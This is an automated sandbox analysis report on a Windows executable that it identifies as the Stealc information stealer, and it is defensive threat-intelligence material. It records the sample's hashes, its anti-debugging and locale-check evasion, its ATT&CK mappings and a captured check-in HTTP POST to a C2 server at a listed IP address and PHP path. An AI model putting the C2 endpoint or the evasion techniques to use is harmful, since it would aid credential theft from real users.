Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QZzvG5G6VE.exe

Overview

General Information

Sample name:QZzvG5G6VE.exe
renamed because original name is a hash value
Original sample name:9c6ce24a5ff45b882abb5ccaca3cf63b.exe
Analysis ID:1386715
MD5:9c6ce24a5ff45b882abb5ccaca3cf63b
SHA1:5f3cafa1ca674e671849502b4f4b74b898a7702a
SHA256:254d94f6404f2c42199ce1c02c405c5ace05fa77cf197c688516a7c2fb61081d
Tags:exeStealc
Infos:

Detection

Stealc
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Stealc
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QZzvG5G6VE.exe (PID: 5668 cmdline: C:\Users\user\Desktop\QZzvG5G6VE.exe MD5: 9C6CE24A5FF45B882ABB5CCACA3CF63B)
    • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    Process Memory Space: QZzvG5G6VE.exe PID: 5668JoeSecurity_StealcYara detected StealcJoe Security
      No Sigma rule has matched
      Timestamp:192.168.2.591.206.178.11849705802044243 02/05/24-11:51:54.791411
      SID:2044243
      Source Port:49705
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://91.206.178.118/31b57f88e9b186cd.phpVirustotal: Detection: 14%Perma Link
      Source: http://91.206.178.118/Virustotal: Detection: 9%Perma Link
      Source: http://91.206.178.118Virustotal: Detection: 9%Perma Link
      Source: QZzvG5G6VE.exeVirustotal: Detection: 41%Perma Link
      Source: QZzvG5G6VE.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014092E0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_014092E0
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01422520 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_01422520
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_0140BB20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0140BB20
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_0140BB80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0140BB80
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_0140A620 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,HeapAlloc,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_0140A620
      Source: QZzvG5G6VE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: QZzvG5G6VE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE932A FindFirstFileExW,0_2_00AE932A

      Networking

      barindex
      Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49705 -> 91.206.178.118:80
      Source: global trafficHTTP traffic detected: POST /31b57f88e9b186cd.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFHost: 91.206.178.118Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 43 30 46 32 34 38 43 42 43 37 31 34 38 36 35 37 30 37 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 45 55 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 2d 2d 0d 0a Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="hwid"C5C0F248CBC71486570719------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="build"EU------JJECGHJDBFIJJJKEHCBF--
      Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014092E0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_014092E0
      Source: unknownHTTP traffic detected: POST /31b57f88e9b186cd.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFHost: 91.206.178.118Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 43 30 46 32 34 38 43 42 43 37 31 34 38 36 35 37 30 37 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 45 55 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 2d 2d 0d 0a Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="hwid"C5C0F248CBC71486570719------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="build"EU------JJECGHJDBFIJJJKEHCBF--
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.0000000001369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.0000000001369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/31b57f88e9b186cd.php
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/31b57f88e9b186cd.phpD
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/31b57f88e9b186cd.php_O
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE1290 GetModuleHandleA,GetProcAddress,VirtualAlloc,NtUnmapViewOfSection,NtUnmapViewOfSection,LoadLibraryA,GetProcAddress,GetProcAddress,lstrlenW,CreateThread,Sleep,WaitForSingleObject,0_2_00AE1290
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE10000_2_00AE1000
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AF05910_2_00AF0591
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE2E800_2_00AE2E80
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014029E80_2_014029E8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01402DE80_2_01402DE8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014031E80_2_014031E8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014028E80_2_014028E8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01402CE80_2_01402CE8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014030E80_2_014030E8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014034E80_2_014034E8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014027C00_2_014027C0
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01402BE80_2_01402BE8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01402FE80_2_01402FE8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014033E80_2_014033E8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014036300_2_01403630
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01402AE80_2_01402AE8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01402EE80_2_01402EE8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014032E80_2_014032E8
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: String function: 00AE48E0 appears 33 times
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeSection loaded: netutils.dllJump to behavior
      Source: QZzvG5G6VE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal80.troj.evad.winEXE@2/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: QZzvG5G6VE.exeVirustotal: Detection: 41%
      Source: unknownProcess created: C:\Users\user\Desktop\QZzvG5G6VE.exe C:\Users\user\Desktop\QZzvG5G6VE.exe
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: QZzvG5G6VE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: QZzvG5G6VE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE1290 GetModuleHandleA,GetProcAddress,VirtualAlloc,NtUnmapViewOfSection,NtUnmapViewOfSection,LoadLibraryA,GetProcAddress,GetProcAddress,lstrlenW,CreateThread,Sleep,WaitForSingleObject,0_2_00AE1290
      Source: QZzvG5G6VE.exeStatic PE information: section name: .Gk17A
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AF1550 push eax; ret 0_2_00AF1570
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AF0CA1 push ecx; ret 0_2_00AF0CB4
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01422B80 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01422B80

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-12223
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-12230
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE932A FindFirstFileExW,0_2_00AE932A
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014200F0 EntryPoint,CreateDCA,GetDeviceCaps,ReleaseDC,GetSystemInfo,GetUserDefaultLangID,GetProcessHeap,HeapAlloc,GetUserNameA,GetProcessHeap,HeapAlloc,GetComputerNameA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,OpenEventA,CreateEventA,0_2_014200F0
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWiy
      Source: QZzvG5G6VE.exe, 00000000.00000002.2003556694.0000000001345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeAPI call chain: ExitProcess graph end nodegraph_0-12229
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeAPI call chain: ExitProcess graph end nodegraph_0-12237
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeAPI call chain: ExitProcess graph end nodegraph_0-12221
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeAPI call chain: ExitProcess graph end nodegraph_0-12213
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE70C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AE70C3
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE1290 GetModuleHandleA,GetProcAddress,VirtualAlloc,NtUnmapViewOfSection,NtUnmapViewOfSection,LoadLibraryA,GetProcAddress,GetProcAddress,lstrlenW,CreateThread,Sleep,WaitForSingleObject,0_2_00AE1290
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE1290 mov eax, dword ptr fs:[00000030h]0_2_00AE1290
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_01422B80 mov eax, dword ptr fs:[00000030h]0_2_01422B80
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AEBA43 GetProcessHeap,0_2_00AEBA43
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE70C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AE70C3
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE481A SetUnhandledExceptionFilter,0_2_00AE481A
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE46BE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AE46BE
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE4B13 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AE4B13
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE4925 cpuid 0_2_00AE4925
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_00AE45A5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AE45A5
      Source: C:\Users\user\Desktop\QZzvG5G6VE.exeCode function: 0_2_014010C0 GetProcessHeap,HeapAlloc,GetComputerNameA,GetProcessHeap,HeapAlloc,GetUserNameA,ExitProcess,0_2_014010C0

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: QZzvG5G6VE.exe PID: 5668, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: QZzvG5G6VE.exe PID: 5668, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Native API
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Process Injection
      LSASS Memory21
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS1
      Account Discovery
      Distributed Component Object ModelInput Capture1
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      System Owner/User Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync123
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      QZzvG5G6VE.exe42%VirustotalBrowse
      QZzvG5G6VE.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://91.206.178.1180%Avira URL Cloudsafe
      http://91.206.178.118/0%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.php0%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.php_O0%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.phpD0%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.php14%VirustotalBrowse
      http://91.206.178.118/10%VirustotalBrowse
      http://91.206.178.11810%VirustotalBrowse
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://91.206.178.118/31b57f88e9b186cd.phptrue
      • 14%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://91.206.178.118/QZzvG5G6VE.exe, 00000000.00000002.2003556694.0000000001369000.00000004.00000020.00020000.00000000.sdmpfalse
      • 10%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://91.206.178.118QZzvG5G6VE.exe, 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
      • 10%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://91.206.178.118/31b57f88e9b186cd.phpDQZzvG5G6VE.exe, 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://91.206.178.118/31b57f88e9b186cd.php_OQZzvG5G6VE.exe, 00000000.00000002.2003556694.000000000135D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      91.206.178.118
      unknownPoland
      200088ARTNET2PLtrue
      Joe Sandbox version:39.0.0 Ruby
      Analysis ID:1386715
      Start date and time:2024-02-05 11:51:06 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 26s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:3
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:QZzvG5G6VE.exe
      renamed because original name is a hash value
      Original Sample Name:9c6ce24a5ff45b882abb5ccaca3cf63b.exe
      Detection:MAL
      Classification:mal80.troj.evad.winEXE@2/0@0/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 93%
      • Number of executed functions: 18
      • Number of non-executed functions: 59
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Not all processes where analyzed, report is missing behavior information
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      91.206.178.118mrkjKujfkP.exeGet hashmaliciousStealcBrowse
      • 91.206.178.118/31b57f88e9b186cd.php
      vR19oQpY8c.exeGet hashmaliciousStealcBrowse
      • 91.206.178.118/a9d06ea3fe859ab7/vcruntime140.dll
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ARTNET2PLmrkjKujfkP.exeGet hashmaliciousStealcBrowse
      • 91.206.178.118
      vR19oQpY8c.exeGet hashmaliciousStealcBrowse
      • 91.206.178.118
      sql.tmp.dll.dllGet hashmaliciousUnknownBrowse
      • 91.206.178.125
